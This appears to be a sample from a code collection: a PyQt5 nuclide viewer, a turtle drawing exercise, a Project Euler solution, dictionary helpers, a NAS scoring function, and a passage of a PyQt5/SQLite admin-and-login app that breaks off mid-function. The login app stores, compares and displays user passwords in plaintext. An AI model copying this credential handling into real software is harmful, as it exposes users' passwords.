+{"seq_id":"7268701558","text":"from PyQt5.QtCore import (Qt, QSize, QRectF)\nfrom PyQt5.QtGui import (QPainter, QColor, QFont)\nfrom PyQt5.QtWidgets import (QWidget, QSizePolicy, QDialog, QTableWidget,\n QTableWidgetItem, QTabWidget, QHBoxLayout,\n QGridLayout, QHeaderView,\n QApplication)\n\nimport Nuclide\n\nGREEK_DICT = {'a':'\\u03B1', 'b':'\\u03B2', \"EC\":'\\u03B5'}\nKEV_TO_MASS = 931494.\n\n\n'''上端块'''\nclass BlockWidgetNuclide(QWidget):\n\n XMARGIN = 400.0\n YMARGIN = 100.0\n\n def __init__(self, nuclide, parent=None):\n super(BlockWidgetNuclide, self).__init__(parent)\n\n self.nuclide = nuclide\n # 固定大小\n self.setFixedSize(QSize(BlockWidgetNuclide.XMARGIN, BlockWidgetNuclide.YMARGIN))\n\n def sizeHint(self):\n return self.minimumSizeHint()\n\n def minimumSizeHint(self):\n return QSize(BlockWidgetNuclide.XMARGIN, BlockWidgetNuclide.YMARGIN)\n\n def paintEvent(self, event=None):\n painter = QPainter(self)\n painter.setRenderHint(QPainter.Antialiasing)\n painter.setRenderHint(QPainter.TextAntialiasing)\n # 视口与窗口\n painter.setViewport(0, 0, BlockWidgetNuclide.YMARGIN, BlockWidgetNuclide.YMARGIN)\n painter.setWindow(0, 0, BlockWidgetNuclide.YMARGIN, BlockWidgetNuclide.YMARGIN)\n\n rect = QRectF(0, 0, self.height(), self.height())\n painter.setPen(Qt.NoPen)\n painter.setBrush(QColor(Qt.blue).lighter(170))\n painter.drawRect(rect)\n # Text for Z, name, symbol\n font = QFont(\"Combria\", 45)\n font.setWeight(QFont.Bold)\n painter.setFont(font)\n painter.setPen(Qt.black)\n painter.drawText(rect, Qt.AlignCenter, \"{}\".format(self.nuclide.element))\n font = QFont(\"Courier New\", 15)\n font.setWeight(QFont.Bold)\n painter.setFont(font)\n painter.setPen(Qt.black)\n painter.drawText(rect, Qt.AlignLeft, \"{}\".format(self.nuclide.A))\n painter.drawText(rect, Qt.AlignBottom | Qt.AlignCenter, \"{0:.2f}\".format(\n float(self.nuclide.mass_defect[\"value\"])/KEV_TO_MASS + self.nuclide.A))\n\n'''\n单个元素控件子类\n'''\n\nclass SingleWidgetNuclide(QDialog):\n\n def __init__(self, nuclide, parent=None):\n super(SingleWidgetNuclide, self).__init__(parent)\n\n self.nuclide = nuclide\n self.setSizePolicy(QSizePolicy(QSizePolicy.Fixed, QSizePolicy.Fixed))\n\n # 上端控件\n topWidget = BlockWidgetNuclide(self.nuclide)\n\n # 下端标签页控件\n self.propertyTable = QTableWidget()\n self.propertyTable.clear()\n self.propertyTable.setRowCount(5)\n self.propertyTable.setColumnCount(2)\n self.propertyTable.verticalHeader().setVisible(False)\n self.propertyTable.horizontalHeader().setVisible(False)\n self.propertyTable.setAlternatingRowColors(True)\n self.propertyTable.setEditTriggers(QTableWidget.NoEditTriggers)\n self.propertyTable.setFocusPolicy(Qt.NoFocus)\n header = self.propertyTable.horizontalHeader() # 设置列宽\n header.setSectionResizeMode(0, QHeaderView.ResizeToContents)\n header.setSectionResizeMode(1, QHeaderView.Stretch)\n\n # 给出各行数据\n item = QTableWidgetItem(\"Mass\")\n self.propertyTable.setItem(0, 0, item)\n try:\n item = QTableWidgetItem(\"{0:.5f} u\".format(float(self.nuclide.mass_defect[\"value\"])/KEV_TO_MASS\n + self.nuclide.A))\n except ValueError:\n item = QTableWidgetItem(\"{0:.5f}{} u\".format(self.nuclide.A, self.nuclide.mass_defect[\"value\"]))\n finally:\n self.propertyTable.setItem(0, 1, item)\n item = QTableWidgetItem(\"Mass Excess\")\n self.propertyTable.setItem(1, 0, item)\n item = QTableWidgetItem(\"{} +/- {} keV\".format(self.nuclide.mass_defect[\"value\"],\n self.nuclide.mass_defect[\"uncertainity\"]))\n self.propertyTable.setItem(1, 1, item)\n item = QTableWidgetItem(\"Half Life\")\n self.propertyTable.setItem(2, 0, item)\n item = QTableWidgetItem(\"{} +/- {} {}\".format(\n self.nuclide.half_life[\"value\"], self.nuclide.half_life[\"uncertainity\"],\n self.nuclide.half_life[\"unit\"]))\n self.propertyTable.setItem(2, 1, item)\n item = QTableWidgetItem(\"Spin\")\n self.propertyTable.setItem(3, 0, item)\n item = QTableWidgetItem(\"{}\".format(self.nuclide.gs_spin[\"value\"]))\n self.propertyTable.setItem(3, 1, item)\n item = QTableWidgetItem(\"Comment\")\n self.propertyTable.setItem(4, 0, item)\n if self.nuclide.comment:\n item = QTableWidgetItem(\"{}\".format(self.nuclide.comment.nodeValue))\n else:\n item = QTableWidgetItem(\" \")\n self.propertyTable.setItem(4, 1, item)\n\n # TODO 衰变模式,激发核的情况\n self.decaymodeTable = QTableWidget()\n decaymode = self.nuclide.decay_modes\n row = len(decaymode)\n self.decaymodeTable = QTableWidget()\n self.decaymodeTable.clear()\n self.decaymodeTable.setRowCount(row)\n self.decaymodeTable.setColumnCount(1)\n self.decaymodeTable.verticalHeader().setVisible(False)\n self.decaymodeTable.horizontalHeader().setVisible(False)\n self.decaymodeTable.setAlternatingRowColors(True)\n self.decaymodeTable.setEditTriggers(QTableWidget.NoEditTriggers)\n self.decaymodeTable.setFocusPolicy(Qt.NoFocus)\n header = self.decaymodeTable.horizontalHeader() # 设置列宽\n header.setSectionResizeMode(0, QHeaderView.Stretch)\n for i, v in enumerate(decaymode):\n v2 = v[\"mode\"]\n for key in GREEK_DICT:\n v2 = v2.replace(key, GREEK_DICT[key])\n item = QTableWidgetItem(\"{:5s} {} {}+/-{} %\".format(\n v2, v[\"relation\"], v[\"value\"], v[\"uncertainity\"]))\n self.decaymodeTable.setItem(i, 0, item)\n\n\n # 使用列表给出数据,使用Tab标签式给出不同分类\n tabWidget = QTabWidget()\n commonWidget = QWidget()\n commonLayout = QHBoxLayout()\n commonLayout.addWidget(self.propertyTable)\n commonWidget.setLayout(commonLayout)\n tabWidget.addTab(commonWidget, \"Common\")\n decaymodeWidget = QWidget()\n decaymodeLayout = QHBoxLayout()\n decaymodeLayout.addWidget(self.decaymodeTable)\n decaymodeWidget.setLayout(decaymodeLayout)\n tabWidget.addTab(decaymodeWidget, \"Decay Mode\")\n\n grid = QGridLayout()\n grid.addWidget(topWidget, 0, 0)\n grid.addWidget(tabWidget, 1, 0)\n self.setLayout(grid)\n\n self.setWindowTitle(self.nuclide.element)\n\n def closeEvent(self, event):\n self.setMouseTracking(True)\n\n\nif __name__ == \"__main__\":\n import sys\n\n app = QApplication(sys.argv)\n nuclides = Nuclide.NuclideLibrary()\n form = SingleWidgetNuclide(nuclides.getNuclide(7, 4))\n form.setWindowTitle(\"GridTest\")\n form.show()\n app.exec_()","repo_name":"Gamin03/PeriodTable","sub_path":"singlewidgetNuclide.pyw","file_name":"singlewidgetNuclide.pyw","file_ext":"pyw","file_size_in_byte":7089,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"6"} +{"seq_id":"24973348128","text":"speed(0)\npenup()\nsetposition(0,-200)\nradius=int(input(\"Radius of bottom snowball?: \"))\ndef make_snowman(radius):\n color(\"gray\")\n make_circle(1)\n nav(2)\n make_circle(2)\n nav(1)\n make_circle(4)\ndef nav(mult):\n left(90)\n forward(radius * mult)\n right(90)\ndef make_circle(div):\n begin_fill()\n circle(radius / div)\n end_fill()\nmake_snowman(radius)","repo_name":"CRTC-Computer-Engineering/CRTC-Python-Examples","sub_path":"CodeHS/2/13/6/Snowman-Travis.py","file_name":"Snowman-Travis.py","file_ext":"py","file_size_in_byte":378,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"6"} +{"seq_id":"4235828780","text":"'''\nCounting rectangles\n\nrectangle:\na * b\n\nsub-rectangle:\n1 * 1\n1 * 2\n...\n1 * a\n2 * 1\n2 * 2\n...\n2 * a\n...\nb * 1\nb * 2\nb * a\n\nnumber of sub rectangle x * y = (a-x+1) * (b-y+1)\n\n2772\n'''\n\ndef countSubRectangle(a, b):\n count = 0\n for x in range(1, a+1):\n for y in range(1, b+1):\n count += (a - x + 1) * (b - y + 1)\n return count\n\n\ndef solution():\n target = 2000000\n minDiff = target\n resultA, resultB = 0, 0\n for a in range(30, 2000):\n for b in range(30, 2000):\n rects = countSubRectangle(a, b)\n diff = abs(rects - target)\n if diff < minDiff:\n minDiff = diff\n resultA, resultB = a, b\n print(resultA, resultB, minDiff)\n if rects > target:\n break\n print(resultA, resultB, countSubRectangle(resultA, resultB))\n\n return resultA * resultB\n\n\nif __name__ == '__main__':\n print('Result:', solution())\n","repo_name":"pz325/ProjectEuler","sub_path":"app/solutions/problem85.py","file_name":"problem85.py","file_ext":"py","file_size_in_byte":949,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"12634412349","text":"def get_keys(x):\n if type(x) == list:\n map_keys = map(lambda y: list(y.keys())[0], x)\n return list(map_keys)\n else:\n return list(x.keys())\n\ndef get_values(x):\n if type(x) == list:\n map_keys = map(lambda y: list(y.values())[0], x)\n return list(map_keys)\n else:\n return list(x.values())\n\ndef create_dict_from_variables(keys, values):\n d = {}\n for index, key in enumerate(keys):\n d[key] = values[index]\n return d\n\ndef get_object_by_keys(dictionary, keys):\n if not keys: return None\n if type(keys)==list:\n key = keys.pop(0)\n result = dictionary.get(key)\n if not result: return result\n if not keys: return result\n return get_object_by_keys(result, keys)\n else:\n return dictionary.get(keys)\n","repo_name":"waynshang/price_alert","sub_path":"utils/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":734,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"13015138806","text":"import torch\nimport numpy as np\n\nfrom . import measure\n\n\ndef get_batch_jacobian(net, x, target, device, split_data):\n x.requires_grad_(True)\n\n N = x.shape[0]\n for sp in range(split_data):\n st=sp*N//split_data\n en=(sp+1)*N//split_data\n y = net(x[st:en])\n y.backward(torch.ones_like(y))\n\n jacob = x.grad.detach()\n x.requires_grad_(False)\n return jacob, target.detach()\n\ndef eval_score(jacob, labels=None):\n corrs = np.corrcoef(jacob)\n v, _ = np.linalg.eig(corrs)\n k = 1e-5\n return -np.sum(np.log(v + k) + 1./(v + k))\n\n@measure('jacob_cov', bn=True)\ndef compute_jacob_cov(net, inputs, targets, split_data=1, loss_fn=None):\n device = inputs.device\n # Compute gradients (but don't apply them)\n net.zero_grad()\n\n jacobs, labels = get_batch_jacobian(net, inputs, targets, device, split_data=split_data)\n jacobs = jacobs.reshape(jacobs.size(0), -1).cpu().numpy()\n\n try:\n jc = eval_score(jacobs, labels)\n except Exception as e:\n print(e)\n jc = np.nan\n\n return jc\n","repo_name":"SamsungLabs/zero-cost-nas","sub_path":"foresight/pruners/measures/jacob_cov.py","file_name":"jacob_cov.py","file_ext":"py","file_size_in_byte":1058,"program_lang":"python","lang":"en","doc_type":"code","stars":137,"dataset":"github-code","pt":"6"} +{"seq_id":"1510517264","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue May 2 09:13:52 2023\r\n\r\n@author: ASUS\r\n\"\"\"\r\nfrom PyQt5.QtWebEngineWidgets import QWebEngineView\r\nimport os\r\nfrom PyQt5 import QtWidgets, uic, QtCore, QtGui\r\nimport pandas as pd\r\nfrom PyQt5.QtWidgets import QTableWidget, QTableWidgetItem,QStyle\r\nfrom PyQt5.QtCore import QSize\r\nfrom PyQt5.QtCore import QUrl\r\nfrom PyQt5.QtWidgets import QApplication, QVBoxLayout, QFrame\r\nfrom PyQt5.QtWidgets import QMessageBox\r\nimport folium\r\nfrom folium.plugins import MarkerCluster\r\nfrom folium import plugins\r\nfrom folium.plugins import MiniMap\r\nfrom folium.raster_layers import TileLayer\r\nfrom matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg as FigureCanvas\r\nimport matplotlib.pyplot as plt\r\nfrom PyQt5.QtGui import QIcon ,QPixmap, QRegion\r\nfrom PyQt5.QtCore import Qt\r\nfrom PyQt5.QtGui import QDoubleValidator ,QBrush ,QColor\r\nimport csv\r\nfrom datetime import datetime\r\nfrom PyQt5.QtCore import QDateTime\r\nfrom PyQt5.QtWidgets import QApplication, QDialog, QLabel, QLineEdit, QPushButton, QVBoxLayout, QMenu, QAction\r\nfrom PyQt5.QtSql import QSqlDatabase, QSqlQuery\r\nimport sys\r\nimport sqlite3\r\nfrom sklearn.preprocessing import OneHotEncoder\r\nimport pickle\r\nfrom PyQt5.QtWidgets import QMainWindow, QFileDialog\r\nfrom PyQt5.QtGui import QImage\r\nimport io\r\nfrom PyQt5 import QtWidgets, uic, QtCore\r\nfrom PyQt5.QtCore import QByteArray, QBuffer, QIODevice\r\nfrom PyQt5.QtCore import Qt\r\nfrom PyQt5.QtSql import QSqlDatabase, QSqlQuery,QSqlQueryModel\r\nfrom apscheduler.schedulers.background import BackgroundScheduler\r\nfrom matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg as FigureCanvas\r\nfrom matplotlib.figure import Figure\r\nfrom matplotlib.backends.backend_qt5agg import NavigationToolbar2QT as NavigationToolbar\r\nimport threading\r\nimport random \r\nimport sys\r\nimport numpy as np\r\nfrom smtp import Mission\r\nfrom PyQt5.QtCore import Qt, QStringListModel\r\nfrom PyQt5.QtWidgets import QCompleter\r\nfrom matplotlib.ticker import MaxNLocator\r\nfrom matplotlib.colors import LinearSegmentedColormap\r\ndef resource_path(relative_path):\r\n \"\"\" Get absolute path to resource, works for dev and for PyInstaller \"\"\"\r\n try:\r\n # PyInstaller creates a temp folder and stores path in _MEIPASS\r\n base_path = sys._MEIPASS2\r\n except Exception:\r\n base_path = os.path.abspath(\".\")\r\n\r\n return os.path.join(base_path, relative_path)\r\nclass admin(QtWidgets.QMainWindow):\r\n def __init__(self):\r\n super().__init__()\r\n uic.loadUi(resource_path('admin.ui'), self)\r\n self.pushButton.clicked.connect(self.selectImage)\r\n self.pushButton_2.clicked.connect(self.saveToDatabase)\r\n self.pushButton_3.clicked.connect(self.login)\r\n # Initialize your database connection\r\n self.db = QSqlDatabase.addDatabase(\"QSQLITE\")\r\n self.db.setDatabaseName(resource_path(\"spdb.db\")) # Replace with the actual database file name\r\n if not self.db.open():\r\n print(\"Failed to connect to the database.\")\r\n sys.exit(1)\r\n\r\n # Connect button signals to slots\r\n self.pushButton.clicked.connect(self.selectImage)\r\n self.pushButton_2.clicked.connect(self.saveToDatabase)\r\n \r\n #styling the tabel\r\n self.tableWidget.setStyleSheet('''\r\n QTableWidget {\r\n background-color: rgb(19, 51, 76);\r\n border: 1px solid rgb(19, 51, 76);\r\n color: rgb(246, 246, 233);\r\n }\r\n \r\n QTableWidget::item {\r\n padding: 5px;\r\n border: 1px solid rgb(253, 95, 0) ;\r\n }\r\n \r\n QHeaderView::section {\r\n background-color: rgb(253, 95, 0);\r\n font-weight: bold;\r\n border: 1px solid rgb(253, 95, 0);\r\n color:rgb(0, 87, 146);\r\n }\r\n''')\r\n #styling the scroll bar\r\n self.tableWidget.verticalScrollBar().setStyleSheet('''\r\n QScrollBar:vertical {\r\n background: transparent;\r\n width: 5px;\r\n border-radius: 7px;\r\n margin: 20px 0 20px 0;\r\n }\r\n\r\n QScrollBar::handle:vertical {\r\n background: rgb(19, 51, 76);\r\n border-radius: 7px;\r\n min-height: 20px;\r\n }\r\n\r\n QScrollBar::add-line:vertical {\r\n border: none;\r\n background: none;\r\n }\r\n\r\n QScrollBar::sub-line:vertical {\r\n border: none;\r\n background: none;\r\n }\r\n\r\n QScrollBar::add-page:vertical, QScrollBar::sub-page:vertical {\r\n background: none;\r\n }\r\n''')\r\n #styling the scroll bar\r\n self.tableWidget.horizontalScrollBar().setStyleSheet('''\r\n QScrollBar:horizontal {\r\n background: transparent;\r\n width: 5px;\r\n border-radius: 7px;\r\n margin: 20px 0 20px 0;\r\n }\r\n\r\n QScrollBar::handle:horizontal {\r\n background: rgb(19, 51, 76);\r\n border-radius: 7px;\r\n min-height: 20px;\r\n }\r\n\r\n QScrollBar::add-line:horizontal {\r\n border: none;\r\n background: none;\r\n }\r\n\r\n QScrollBar::sub-line:horizontal {\r\n border: none;\r\n background: none;\r\n }\r\n\r\n QScrollBar::add-page:horizontal, QScrollBar::sub-page:horizontal {\r\n background: none;\r\n }\r\n''') \r\n # Connect to the database\r\n conn = sqlite3.connect(resource_path(\"spdb.db\")) # Replace with the actual database file name\r\n cursor = conn.cursor()\r\n \r\n # Retrieve data from the database table\r\n cursor.execute(\"SELECT username,password FROM users\")\r\n data = cursor.fetchall()\r\n\r\n # Set the number of rows and columns in the table\r\n self.tableWidget.setRowCount(len(data))\r\n self.tableWidget.setColumnCount(len(data[0]) + 1) # Add 1 for the delete button column\r\n # Assuming all rows have the same number of columns\r\n\r\n # Add data to the table\r\n for i, row in enumerate(data):\r\n for j, value in enumerate(row):\r\n item = QTableWidgetItem(str(value))\r\n self.tableWidget.setItem(i, j, item)\r\n # Add a delete button to the last column\r\n delete_button = QPushButton(\"\")\r\n delete_button.setIcon(QIcon(resource_path('icons\\\\icons8-trash-52.png')))\r\n delete_button.setStyleSheet(''' QPushButton { background-color: rgb(253, 95, 0);\r\n font: 900 8pt Arial Black;\r\n color:rgb(0, 87, 146);\r\n border: 1px solid rgb(237, 131, 0);\r\n border-radius:25%;\r\n }\r\n QPushButton:hover {\r\n background-color:qlineargradient(spread:repeat, x1:0, y1:1, x2:1, y2:0, stop:0.28436 rgba(253, 95, 0, 255), stop:0.890995 rgba(255, 193, 35, 255));\r\n border: 1px solid gray;\r\n box-shadow: 5px 10px rgb(255, 175, 15);\r\n }''')\r\n delete_button.clicked.connect(lambda _, row=i: self.deleteRow(row)) # Connect the delete button to the deleteRow method\r\n self.tableWidget.setCellWidget(i, len(row), delete_button) \r\n self.tableWidget.setColumnWidth(0, 100)\r\n self.tableWidget.setColumnWidth(1, 100)\r\n self.tableWidget.setColumnWidth(2, 50)\r\n header_label = QTableWidgetItem(\"\")\r\n self.tableWidget.setHorizontalHeaderItem(2, header_label)\r\n # Set table properties\r\n header_labels = [description[0] for description in cursor.description]\r\n self.tableWidget.setHorizontalHeaderLabels(header_labels)\r\n self.tableWidget.setVerticalScrollBarPolicy(Qt.ScrollBarAsNeeded)\r\n self.tableWidget.setSizeAdjustPolicy(QTableWidget.AdjustToContents)\r\n self.tableWidget.setEditTriggers(QTableWidget.NoEditTriggers)\r\n self.tableWidget.setHorizontalScrollBarPolicy(Qt.ScrollBarAlwaysOff)\r\n self.tableWidget.verticalHeader().setVisible(False)\r\n\r\n # Close the database connection\r\n conn.close()\r\n \r\n def deleteRow(self, row):\r\n # Get the item in the first column (assumed to be the primary key)\r\n item = self.tableWidget.item(row, 0)\r\n username = item.text() # Assuming the primary key is an integer\r\n\r\n # Delete the row from the table\r\n self.tableWidget.removeRow(row)\r\n\r\n # Delete the row from the database\r\n conn = sqlite3.connect(resource_path(\"spdb.db\") ) # Replace with the actual database file name\r\n cursor = conn.cursor()\r\n cursor.execute(\"DELETE FROM users WHERE username = ?\", (username,))\r\n conn.commit()\r\n conn.close()\r\n def login(self):\r\n self.window1=Window1()\r\n self.hide()\r\n self.window1.show()\r\n def selectImage(self):\r\n file_dialog = QFileDialog(self)\r\n file_dialog.setWindowTitle(\"Select Image\")\r\n file_dialog.setNameFilter(\"Images (*.png *.jpg *.jpeg *.gif)\")\r\n\r\n try:\r\n if file_dialog.exec_():\r\n self.selected_file = file_dialog.selectedFiles()[0]\r\n except KeyboardInterrupt:\r\n print(\"Program execution interrupted.\")\r\n sys.exit(0) # Exit the program gracefully\r\n def saveToDatabase(self):\r\n username = self.lineEdit.text()\r\n password = self.lineEdit_2.text()\r\n email = self.lineEdit_3.text()\r\n role = self.comboBox.currentText()\r\n if not username or not password:\r\n print(\"Please enter both username and password.\")\r\n self.label_3.setText(\"*Please enter both username and password.\")\r\n return\r\n\r\n # Set a default image if no image is selected\r\n if not hasattr(self, 'selected_file'):\r\n default_image_path =resource_path( \"icons8-username-96.png\" ) # Replace with the path to your default image\r\n self.selected_file = default_image_path\r\n\r\n # Check if the username already exists in the database\r\n query = QSqlQuery()\r\n query.prepare(\"SELECT username FROM users WHERE username = ?\")\r\n query.addBindValue(username)\r\n if query.exec_() and query.next():\r\n self.label_3.setText(\"*Username already exists. Please try another one.\")\r\n return\r\n\r\n # Convert the image to binary data\r\n image = QImage(self.selected_file)\r\n byte_array = QByteArray()\r\n buffer = QBuffer(byte_array)\r\n buffer.open(QIODevice.WriteOnly)\r\n image.save(buffer, \"PNG\")\r\n\r\n # Implement your logic to save the data to the database\r\n # Here, you can use your database connection and execute the necessary SQL statements\r\n\r\n # Example code to insert username, password, email, role, and image into a table named 'users'\r\n query.prepare(\"INSERT INTO users (username, password, email, role, image) VALUES (?, ?, ?, ?, ?)\")\r\n query.addBindValue(username)\r\n query.addBindValue(password)\r\n query.addBindValue(email)\r\n query.addBindValue(role)\r\n query.addBindValue(byte_array)\r\n\r\n if query.exec_():\r\n print(\"Data saved to the database.\")\r\n self.label_3.setText(\"\")\r\n self.lineEdit.clear()\r\n self.lineEdit_2.clear()\r\n self.lineEdit_3.clear()\r\n self.db.close()\r\n\r\n # Connect button signals to slots\r\n self.pushButton.clicked.connect(self.selectImage)\r\n self.pushButton_2.clicked.connect(self.saveToDatabase)\r\n \r\n #styling the tabel\r\n self.tableWidget.setStyleSheet('''\r\n QTableWidget {\r\n background-color: rgb(19, 51, 76);\r\n border: 1px solid rgb(19, 51, 76);\r\n color: rgb(246, 246, 233);\r\n }\r\n \r\n QTableWidget::item {\r\n padding: 5px;\r\n border: 1px solid rgb(253, 95, 0) ;\r\n }\r\n \r\n QHeaderView::section {\r\n background-color: rgb(253, 95, 0);\r\n font-weight: bold;\r\n border: 1px solid rgb(253, 95, 0);\r\n color:rgb(0, 87, 146);\r\n }\r\n''') \r\n #styling the scroll bar\r\n self.tableWidget.verticalScrollBar().setStyleSheet('''\r\n QScrollBar:vertical {\r\n background: transparent;\r\n width: 5px;\r\n border-radius: 7px;\r\n margin: 20px 0 20px 0;\r\n }\r\n\r\n QScrollBar::handle:vertical {\r\n background: rgb(19, 51, 76);\r\n border-radius: 7px;\r\n min-height: 20px;\r\n }\r\n\r\n QScrollBar::add-line:vertical {\r\n border: none;\r\n background: none;\r\n }\r\n\r\n QScrollBar::sub-line:vertical {\r\n border: none;\r\n background: none;\r\n }\r\n\r\n QScrollBar::add-page:vertical, QScrollBar::sub-page:vertical {\r\n background: none;\r\n }\r\n''')\r\n #styling the scroll bar\r\n self.tableWidget.horizontalScrollBar().setStyleSheet('''\r\n QScrollBar:horizontal {\r\n background: transparent;\r\n width: 5px;\r\n border-radius: 7px;\r\n margin: 20px 0 20px 0;\r\n }\r\n\r\n QScrollBar::handle:horizontal {\r\n background: rgb(19, 51, 76);\r\n border-radius: 7px;\r\n min-height: 20px;\r\n }\r\n\r\n QScrollBar::add-line:horizontal {\r\n border: none;\r\n background: none;\r\n }\r\n\r\n QScrollBar::sub-line:horizontal {\r\n border: none;\r\n background: none;\r\n }\r\n\r\n QScrollBar::add-page:horizontal, QScrollBar::sub-page:horizontal {\r\n background: none;\r\n }\r\n''') \r\n\r\n \r\n # Connect to the database\r\n conn = sqlite3.connect(resource_path(\"spdb.db\")) # Replace with the actual database file name\r\n cursor = conn.cursor()\r\n \r\n # Retrieve data from the database table\r\n cursor.execute(\"SELECT username,password FROM users\")\r\n data = cursor.fetchall()\r\n\r\n # Set the number of rows and columns in the table\r\n self.tableWidget.setRowCount(len(data))\r\n self.tableWidget.setColumnCount(len(data[0]) + 1) # Add 1 for the delete button column\r\n # Assuming all rows have the same number of columns\r\n\r\n # Add data to the table\r\n for i, row in enumerate(data):\r\n for j, value in enumerate(row):\r\n item = QTableWidgetItem(str(value))\r\n self.tableWidget.setItem(i, j, item)\r\n # Add a delete button to the last column\r\n delete_button = QPushButton(\"\")\r\n delete_button.setIcon(QIcon(resource_path(\"icons\\\\icons8-trash-52.png\")))\r\n delete_button.setStyleSheet(''' QPushButton { background-color: rgb(253, 95, 0);\r\n font: 900 8pt Arial Black;\r\n color:rgb(0, 87, 146);\r\n border: 1px solid rgb(237, 131, 0);\r\n border-radius:25%;\r\n }\r\n QPushButton:hover {\r\n background-color:qlineargradient(spread:repeat, x1:0, y1:1, x2:1, y2:0, stop:0.28436 rgba(253, 95, 0, 255), stop:0.890995 rgba(255, 193, 35, 255));\r\n border: 1px solid gray;\r\n box-shadow: 5px 10px rgb(255, 175, 15);\r\n }''')\r\n delete_button.clicked.connect(lambda _, row=i: self.deleteRow(row)) # Connect the delete button to the deleteRow method\r\n self.tableWidget.setCellWidget(i, len(row), delete_button) \r\n self.tableWidget.setColumnWidth(0, 100)\r\n self.tableWidget.setColumnWidth(1, 100)\r\n self.tableWidget.setColumnWidth(2, 50)\r\n header_label = QTableWidgetItem(\"\")\r\n self.tableWidget.setHorizontalHeaderItem(2, header_label)\r\n # Set table properties\r\n header_labels = [description[0] for description in cursor.description]\r\n self.tableWidget.setHorizontalHeaderLabels(header_labels)\r\n self.tableWidget.setVerticalScrollBarPolicy(Qt.ScrollBarAsNeeded)\r\n self.tableWidget.setSizeAdjustPolicy(QTableWidget.AdjustToContents)\r\n self.tableWidget.setEditTriggers(QTableWidget.NoEditTriggers)\r\n self.tableWidget.setHorizontalScrollBarPolicy(Qt.ScrollBarAlwaysOff)\r\n self.tableWidget.verticalHeader().setVisible(False)\r\n\r\n # Close the database connection\r\n conn.close()\r\n \r\n\r\nclass Window1(QtWidgets.QMainWindow):\r\n def __init__(self):\r\n super().__init__()\r\n uic.loadUi(resource_path('login.ui'), self)\r\n self.pushButton.clicked.connect(self.show_main)\r\n self.pushButton_2.clicked.connect(self.show_admin)\r\n \r\n def show_main(self):\r\n # Get the username and password from the input fields\r\n username = self.lineEdit.text()\r\n password = self.lineEdit_2.text()\r\n \r\n db = QSqlDatabase.addDatabase(\"QSQLITE\")\r\n db.setDatabaseName(resource_path(\"spdb.db\")) # Replace with the actual database file name\r\n\r\n if not db.open():\r\n print(\"Failed to connect to the database.\")\r\n sys.exit(1)\r\n\r\n # Query the database for the username and password\r\n query = QSqlQuery()\r\n query.prepare(\"SELECT * FROM users WHERE username = :username AND password = :password\")\r\n query.bindValue(\":username\", username)\r\n query.bindValue(\":password\", password)\r\n\r\n if query.exec_() and query.next():\r\n id_user = query.value(0)\r\n role = query.value(5) # Assuming the role column is at index 4 in the query result\r\n\r\n if role == \"department head\":\r\n msg_box = QMessageBox()\r\n msg_box.setStyleSheet(\r\n \"QMessageBox { background-color: #F6F6E9; }\"\r\n \"QMessageBox QLabel { color: #13334C; }\"\r\n \"QMessageBox QPushButton {\"\r\n \" background-color: #005792;\"\r\n \" color: #F6F6E9;\"\r\n \" padding: 5px 10px;\"\r\n \" border: none;\"\r\n \"}\"\r\n \"QMessageBox QPushButton:hover { background-color: #FD5F00; }\"\r\n)\r\n msg_box.setWindowTitle(\"Department Head Role Selection\")\r\n msg_box.setIcon(QMessageBox.Information) \r\n msg_box.setText(\"Choose an option:\")\r\n msg_box.addButton(\"Plan Missions\", QMessageBox.AcceptRole)\r\n msg_box.addButton(\"Log Normally\", QMessageBox.RejectRole)\r\n choice = msg_box.exec_()\r\n \r\n if choice == QMessageBox.AcceptRole:\r\n # Open the plan missions window or perform any other action\r\n self.planmession=Mission()\r\n self.hide()\r\n self.planmession.show()\r\n else:\r\n self.show_mainwi(username, id_user, db)\r\n\r\n else:\r\n self.show_mainwi(username, id_user, db)\r\n\r\n else:\r\n print(\"Login failed\")\r\n self.label_4.setText(\"Incorrect username or password.\")\r\n\r\n db.commit()\r\n db.close()\r\n\r\n def show_mainwi(self,username, id_user, db):\r\n # Query the database for the image_data\r\n image_query = QSqlQuery()\r\n image_query.prepare(\"SELECT image FROM users WHERE username = ?\")\r\n image_query.addBindValue(username)\r\n\r\n if image_query.exec_() and image_query.next():\r\n image_blob = image_query.value(0)\r\n\r\n if image_blob is not None:\r\n pixmap = QPixmap()\r\n pixmap.loadFromData(image_blob)\r\n\r\n # Assuming you have the original pixmap stored in 'pixmap'\r\n scaled_pixmap = pixmap.scaled(40, 40, aspectRatioMode=Qt.KeepAspectRatio,\r\n transformMode=Qt.SmoothTransformation)\r\n\r\n\r\n self.mainwi = mainwi()\r\n self.hide()\r\n self.mainwi.show()\r\n\r\n # Apply rounded border radius to the label\r\n mask = QRegion(self.mainwi.label_19.rect(), QRegion.Ellipse)\r\n self.mainwi.label_19.setMask(mask)\r\n self.mainwi.label_19.setStyleSheet(\"border-radius: 20%;\")\r\n self.mainwi.label_19.setPixmap(scaled_pixmap)\r\n self.mainwi.toolButton.setText(username)\r\n self.mainwi.label_19.setGeometry(self.mainwi.frame.width() - 50, 10, 40, 40)\r\n self.mainwi.toolButton.setGeometry(self.mainwi.frame.width() - 110, 10, 100, 40)\r\n self.mainwi.listWidget.clear()\r\n\r\n # Retrieve ongoing missions for the current user\r\n msquery = QSqlQuery()\r\n msquery.prepare(\"SELECT * FROM messions WHERE assigned_to = ? AND state = 'ongoing'\")\r\n msquery.addBindValue(id_user)\r\n msquery.exec_()\r\n\r\n while msquery.next():\r\n mission_id = msquery.value(0)\r\n description = msquery.value(1)\r\n end_date = msquery.value(3)\r\n end_date = datetime.strptime(end_date, \"%Y-%m-%d %H:%M:%S\")\r\n remaining_time = end_date - datetime.now()\r\n\r\n if remaining_time.days > 365:\r\n remaining_text = f\"{remaining_time.days // 365} years\"\r\n elif remaining_time.days > 30:\r\n remaining_text = f\"{remaining_time.days // 30} months\"\r\n elif remaining_time.days > 0:\r\n remaining_text = f\"{remaining_time.days} days\"\r\n elif remaining_time.seconds > 3600:\r\n remaining_text = f\"{remaining_time.seconds // 